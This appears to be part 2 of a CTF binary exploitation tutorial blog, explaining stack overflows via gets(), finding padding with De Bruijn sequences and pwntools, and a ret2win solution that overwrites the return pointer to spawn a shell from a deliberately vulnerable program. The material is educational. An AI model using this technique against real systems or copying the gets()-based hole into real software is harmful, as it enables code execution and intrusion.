How do I even pwn anything? Part 2— Overwriting The Return Pointer

Daryl 🥖
5 min readApr 13, 2024

--

Explore how to perform Linux Binary Exploitation from Capture-the-Flag (CTF) competitions.

Click here for part 1!

Course Link

You can find all the files required for the exercises on GitHub.

Our First Stack Overflow

Let’s recall the sample C code again. It is a main function that allocates 16 bytes to the stack. It then gets user input and returns. What could possibly go wrong?

int main() {
char buffer[16];
gets(buffer);

return 0;
}

Well turns out, everything could go wrong here! The gets() function does not limit the amount of data that is written to the stack, and if the data exceeds the allocated size, it will overwrite the previous stack frame’s EBP, or more importantly, it will overwrite the return pointer!

Let’s take a look at the stack again, but this time, we write 24 bytes instead of 16 bytes to the stack. I will include the addresses of the registers ESP, EBP and EIP too.

Let’s begin by initialising the stack frame and allocating 16 bytes of memory.

Creating stack frame and allocating memory

Now let’s feed 24 A characters into the stack and observe what happens. Pay attention to the memory addresses, especially EIP.

Overflowing the buffer

We did it! We managed to redirect the program flow! EIP now points to 0x41414141 . How can this be useful?

What if we replaced 0x41414141 with an address of another function? What if there is an interesting function at address 0x8048412? How could we overwrite the return address with that?

Well, obviously unlike AAAA , it is a bit harder to type out non-human readable characters. However, we can circumvent this by using the echo command!

echo -en "AAAA" | hexdump
echo -en "\x12\x84\x04\x08" | hexdump

A few questions to ponder upon. What is the -en for? Why is the address backwards? How do we pass these bytes into the vulnerable program?

Printing non-human readable characters

Awesome! Now all we have to do is to retrieve the addresses on the interesting functions. We can get the addresses of these symbols (functions and global variables) by using the readelf -s command.

readelf -s binaryfile
Finding the address of the win function in a binary file

Excellent! We now know that the address of the win function is 0x8048412

Finding The Padding

One last thing! In this scenario, you know that 20 bytes of padding is required before any further input would overwrite the return address. However, manually finding this padding is annoying. What if you’d need 64 bytes? 256 bytes? Maybe even 10 kilobytes? That’s a huge buffer that can get very annoying really quickly.

Sure, you can always make educated guesses and perform trial and error, but what if there’s a better way?

Introducing the De Brujin Sequence, which according to Wikipedia is “A cyclic sequence in which every possible length-n string on A occurs exactly once as a substring”.

De Brujin Sequence visualised

Notice how every green-highlighted portion never repeats? We can generate a huge sequence, pass it to the buffer and observe the value of the return address after it has been overwritten. We can then use a program to calculate the offset to get the padding!

You can generate such a sequence using pwntools.

from pwn import *
cyclic(50) # Generate sequence
cyclic_find(0x61616174) # Find offset
Side by side comparison of manual vs De Brujin sequence

Oh yeah, one final thing I promise, you can pipe your data to netcat by using the | symbol.

echo "somedata" | nc example.com 420

Exercise

Return To Win — Hijacking the return pointer to control code execution

You can find the binary and source code in at ret2win32. If you deployed the services locally, this exercise can be accessed using nc localhost 30000

#include <stdio.h>
#include <stdlib.h>

void win() {
system("/bin/sh");
}

void vuln() {
char buffer[64];
gets(buffer);
}

int main() {
setvbuf(stdout, NULL, _IONBF, 0);
setvbuf(stdin, NULL, _IONBF, 0);

puts("Guess my name");
vuln();
puts("Wrong!");

return 0;
}

Try it on your own first and see if you can spot the vulnerability and get the flag!

Solution

If you didn’t manage to pwn it, do not worry, look at the solution and see if you can replicate it for yourself.

Let’s use Pwndbg’s cyclic command to generate the De Brujin sequence. Do cyclic 100 and feed it into the program. We notice that there is a segmentation fault at 0x61616174. This occurs because we have successfully overwritten the return address with our input.

Let’s use cyclic -l 0x61616174 to find the offset. In this case, we see that we need 76 bytes before overwriting the return address.

Finding the padding offset required

Great! All we have left to do is to feed the address of the win() function and we will be able to get the flag. Using x win in Pwndbg, we can find the address of the win function

Address of the win function

Ok, let’s put everything together! Let’s begin with 76 A characters (in pink), followed by the address of the win function in little endian format (in yellow) and pipe it to the ret2win32 binary.

Overwriting the return address

Wait what? Where’s the shell?

That’s because the output of echo is sent into input of binary, once echo is done, the pipe is closed. This means that we actually got our shell, it just closed before we could do input anything!

We can solve this by using cat to keep the pipe open and pass the STDIN into STDOUT. STDOUT of cat is piped as STDIN of the binary (shell).

Piping STDOUT into STDIN

Now we can interact with the shell! Solution script here.

Click here for part 3!

--

--